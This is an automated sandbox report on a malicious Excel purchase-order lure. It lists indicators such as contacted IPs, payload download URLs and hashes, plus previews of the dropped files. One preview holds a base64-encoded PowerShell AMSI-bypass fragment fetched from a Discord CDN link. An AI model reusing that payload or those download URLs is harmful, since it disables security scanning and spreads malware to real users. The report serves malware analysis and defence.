                                                                                                                http://searchresults.news.com.au/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://www.google.si/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://cdn.discordapp.com/attacpowershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.google.cz/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.soso.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.univision.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://search.ebay.it/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.asharqalawsat.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://busca.orange.es/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://cnweb.search.live.com/results.aspx?q=explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://auto.search.msn.com/response.asp?MT=explorer.exe, 0000000C.00000000.2230941988.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.target.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://buscador.terra.es/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.iask.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.tesco.com/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • 0%, Virustotal, Browse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown

Contacted IPs

Public

IP               Domain              Country        ASN    ASN Name           Malicious
162.159.130.233  cdn.discordapp.com  United States  13335  CLOUDFLARENETUS    false
172.245.119.43   unknown             United States  36352  AS-COLOCROSSINGUS  true

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 452643
Start date: 22.07.2021
Start time: 17:16:57
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 44s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PO20210722.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 13
Number of new started drivers analysed: 2
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSX@12/15@4/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 18.2% (good quality ratio 16.5%)
• Quality average: 67.3%
• Quality standard deviation: 31.4%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time      Type             Description
17:18:07  API Interceptor  36x Sleep call for process: EQNEDT32.EXE modified
17:18:10  API Interceptor  333x Sleep call for process: powershell.exe modified
17:18:38  API Interceptor  98x Sleep call for process: calc.exe modified
17:19:06  API Interceptor  217x Sleep call for process: NAPSTAT.EXE modified

Joe Sandbox View / Context

IPs


Domains


ASN

                                                                                                                                                        • 172.67.188.154
                                                                                                                                                        Bank contract,PDF.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.188.154
                                                                                                                                                        Scan003000494 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.188.154
                                                                                                                                                        Swift-pdf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.13.164
                                                                                                                                                        Order _ 08201450.docGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.188.154
                                                                                                                                                        aLLEK0YD2O.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.13.164
                                                                                                                                                        Statement SKBMT 09818.jarGet hashmaliciousBrowse
                                                                                                                                                        • 66.235.200.145
                                                                                                                                                        DOC98374933_JULY2021.EXEGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.203.175
                                                                                                                                                        Specifications_Details_20337_FLQ.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.188.154
                                                                                                                                                        RFQ - 4 SCH 160 EQUAL TEE.docGet hashmaliciousBrowse
                                                                                                                                                        • 172.67.169.145
                                                                                                                                                        RIi1iCfuVK.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.51.99
                                                                                                                                                        kkXJRT8vEl.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.51.99
                                                                                                                                                        kS2dqbsDwD.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.25.234.53
                                                                                                                                                        Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.25.233.53
                                                                                                                                                        SgjcpodWpB.exeGet hashmaliciousBrowse
                                                                                                                                                        • 104.21.14.85
                                                                                                                                                        AS-COLOCROSSINGUSUSD_SLIP.docxGet hashmaliciousBrowse
                                                                                                                                                        • 198.46.132.159
                                                                                                                                                        o3ZUDIEL1vGet hashmaliciousBrowse
                                                                                                                                                        • 107.173.85.99
                                                                                                                                                        Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.12.81.125
                                                                                                                                                        BANKINV19072021LIMCA.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 192.227.129.35
                                                                                                                                                        aJw19xLGjcGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.196.205
                                                                                                                                                        uqZ7bBFvVLGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.196.205
                                                                                                                                                        9J7OaHH7ObGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.196.205
                                                                                                                                                        QbdydvqPuuGet hashmaliciousBrowse
                                                                                                                                                        • 107.172.196.205
                                                                                                                                                        sphost.exeGet hashmaliciousBrowse
                                                                                                                                                        • 172.245.186.101
                                                                                                                                                        _VM_1064855583.HtMGet hashmaliciousBrowse
                                                                                                                                                        • 75.127.11.55
                                                                                                                                                        Inv-04_PDF.vbsGet hashmaliciousBrowse
                                                                                                                                                        • 192.227.128.168
                                                                                                                                                        Dvf7OP92yJGet hashmaliciousBrowse
                                                                                                                                                        • 104.170.143.71
                                                                                                                                                        PURCHASE ORDER 72021.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.12.81.125
                                                                                                                                                        Order Request for Quotation.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.12.91.134
                                                                                                                                                        Quotaton.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.12.81.125
                                                                                                                                                        SWIFT MESSAGE DETAILS.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 192.210.173.40
                                                                                                                                                        PI.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.23.207.48
                                                                                                                                                        ftpp.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.46.132.159
                                                                                                                                                        swift.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 198.23.207.48
                                                                                                                                                        Ever Brilliant scan.xlsxGet hashmaliciousBrowse
                                                                                                                                                        • 192.210.173.40

JA3 Fingerprints

Associated Sample Name / URL | Detection | Context
Match: 7dcce5b76c8b17472d024758970a406b
USD_SLIP.docx | malicious | 162.159.130.233
ORD.ppt | malicious | 162.159.130.233
11.docx | malicious | 162.159.130.233
New order (DDV21-0014) TOKYO HIP.ppt | malicious | 162.159.130.233
Statement.xlsx | malicious | 162.159.130.233
PO20210719.docx | malicious | 162.159.130.233
Invoice-Scancopy.docx | malicious | 162.159.130.233
New Purchase Order-030220.ppt | malicious | 162.159.130.233
ly1.xlsx | malicious | 162.159.130.233
DHL_119040 Beleg.ppt | malicious | 162.159.130.233
Machine Service.xlsx | malicious | 162.159.130.233
ABS 1234 PO.docx | malicious | 162.159.130.233
lokibot.docx | malicious | 162.159.130.233
RevisedSpreadsheet.xlsx | malicious | 162.159.130.233
RFQ-21213.docx | malicious | 162.159.130.233
Shipping Documents.doc | malicious | 162.159.130.233
Drawing for Our New Order.ppt | malicious | 162.159.130.233
DHL SHIPMENT NOTIFICATION,76207428452.doc | malicious | 162.159.130.233
SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.23572.rtf | malicious | 162.159.130.233
Preview Orders.doc | malicious | 162.159.130.233

Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\Public\vbc.exe | PO20210719.docx | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe | PO20210719.docx | malicious

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\oad[1].jpg
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: downloaded
Size (bytes): 2026850
Entropy (8bit): 4.762681838766658
Encrypted: false
SSDEEP: 12288:BgrUL/QryYqJOkK82HIUHvDcZIyy/hBc2T1odg+GfVwZQIzbiVgFvC4nPuoHMcnS:i
MD5: 7E40951D41A43B25F38C6DD25DC4BFE3
SHA1: D389E4ED359D16981FF0E05739AC4C4A96311C60
SHA-256: 64A73E000DC919BC362CEA33F87549DA0D847C16F826E62138BF269006EF8C1C
SHA-512: 17782CE108E5B7443D69CF024E497D33A3D9A2A39E155A34E3BD59832F447C31EF4DD75E2FAF1B381F38691CCF9E11FB6D579896D999E5097BE1700A5AA17E01
Malicious: false
Reputation: low
IE Cache URL: https://cdn.discordapp.com/attachments/858793322087710753/863891857608015902/oad.jpg
                                                                                                                                                            Preview: V3JpdGUtVmVyYm9zZSAiR2V0LURlY29tcHJlc3NlZEJ5dGVBcnJheSI7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nO1dyaXRlLVZlcmJvc2UgIkdldC1EZWNvbXByZXNzZWRCeXRlQXJyYXkiOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYSA9IFtSZWZdLkFzc2VtYmx5LkdldFR5cGUoJ1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uQW1zaVV0JysnaWxzJykKJGggPSAiNDQ1NjYyNTIyMDU3NTI2MzE3NDQ1MjU1NDg0NyIKJHMgPSBbc3RyaW5nXSgwLi4xM3wle1tjaGFyXVtpbnRdKDUzKygkaCkuc3Vic3RyaW5nKCgkXyoyKSwyKSl9KS1yZXBsYWNlICIgIgokYiA9ICRhLkdldEZpZWxkKCRzLCdOb25QdWJsaWMsU3RhdGljJykKJGIuU2V0VmFsdWUoJG51bGwsJHRydWUpOyAkYT0kYT1Xcml0ZS1Ib3N0ICd7Mjc4MTc2MUUtMjhFMC00MTA5LTk5RkUtQjlEMTI3QzU3QUZFfSc7JGE9JGE9V3JpdGUtSG9zdCAnezI3ODE3NjFFLTI4RTAtNDEwOS05OUZFLUI5RDEyN0M1N0FGRX0nOyRhPSRhPVdyaXRlLUhvc3QgJ3syNzgxNzYxRS0yOEUwLTQxMDktOTlGRS1COUQxMjdDNTdBRkV9JzskYT0kYT1Xcml0ZS1Ib3N0ICd7Mjc4MTc2MUUtMjhFMC00MTA5LTk5RkUtQjlEMTI3QzU3QUZFfSc7CldyaXRlLUhvc3QgIisrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysr
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32+ executable (console) x86-64, for MS Windows
Category: downloaded
Size (bytes): 26624
Entropy (8bit): 6.055482508518817
Encrypted: false
SSDEEP: 768:ko9xN+bR7ftwwAqCnv/sx3OfEbR7t6ll:nPwbR8t/3MR7AP
MD5: F5041EC4CE468A07ECBFD076BC0F879B
SHA1: BDA8CEA1EC8D1CEA253FC661559CD84CEE2195B9
SHA-256: CAFF14D450514A35EAC5BA34B3E74126360662D7C8FDF60A8008A0E3BB8ED0B3
SHA-512: 4E64A727DA994675AA7517F260D639691F6A94BC9C510DDDE9D54F2F6E7F005B8B799EEEA1D9AAD1DC5128290654FA884A4AA0E397F96444914A067B8BD15C88
Malicious: true
Antivirus:
• Virustotal, Detection: 46%
• Metadefender, Detection: 20%
• ReversingLabs, Detection: 57%
Joe Sandbox View:
• Filename: PO20210719.docx, Detection: malicious
Reputation: low
IE Cache URL: http://172.245.119.43/d/obi.exe
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...h..`..........'..........H................@............................................... .............................................................P...p............................................P..(....................................................text...(...........................`.P`.data........0......."..............@.P..rdata..0....@.......$..............@.`@.pdata..p....`.......:..............@.0@.xdata.......p.......>..............@.0@.bss..................................`..idata...............@..............@.0..CRT....h............H..............@.@..tls.................J..............@.@..vmp0................L..............`..h.cobf................\..........................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D9484A8.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):94963
Entropy (8bit):7.9700481154985985
Encrypted:false
SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
MD5:17EC925977BED2836071429D7B476809
SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
Malicious:false
Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\644833DE.jpeg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
Category:dropped
Size (bytes):62140
Entropy (8bit):7.529847875703774
Encrypted:false
SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
MD5:722C1BE1697CFCEAE7BDEFB463265578
SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
Malicious:false
Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70F76B9C.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):94963
Entropy (8bit):7.9700481154985985
Encrypted:false
SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
MD5:17EC925977BED2836071429D7B476809
SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
Malicious:false
Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\95D899CB.emf
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Category:dropped
Size (bytes):648132
Entropy (8bit):2.8123868765428575
Encrypted:false
SSDEEP:3072:C34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:M4UcLe0JOcXuunhqcS
MD5:B1201D35B95678AB9D8E1782E6C71E6C
SHA1:967D7CF6F5294A6E99E4EE780ED02CAA2293D2A6
SHA-256:4DC5CBF55010B223DC5E2E19962DFFAD82AF9B994398687B979D5CB9CADF82A4
SHA-512:EFCD4C5BFEC436BF4E6DAB1B21FC41A0A4C1AEF69C481D3A69C9D2AE74ABBE857E0DBBFEEF20EA0A782EE63279B14D1CAEC30AF373A6C18435F59C147B9219B4
Malicious:false
Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................z$...<..-z.z.@..%......\.........@...N.P..........(......N.P...... ....y.z...... .........c..z.z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........L..X...............c....vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4C3E111.jpeg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:dropped
Size (bytes):85020
Entropy (8bit):7.2472785111025875
Encrypted:false
SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:738BDB90A9D8929A5FB2D06775F3336F
SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:false
Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3B800A.jpeg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
Category:dropped
Size (bytes):62140
Entropy (8bit):7.529847875703774
Encrypted:false
SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
MD5:722C1BE1697CFCEAE7BDEFB463265578
SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
Malicious:false
Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3AC9EED.jpeg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:dropped
Size (bytes):85020
Entropy (8bit):7.2472785111025875
Encrypted:false
SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:738BDB90A9D8929A5FB2D06775F3336F
SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:false
Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5037C83.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):11303
Entropy (8bit):7.909402464702408
Encrypted:false
SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:false
Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED031647.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):11303
Entropy (8bit):7.909402464702408
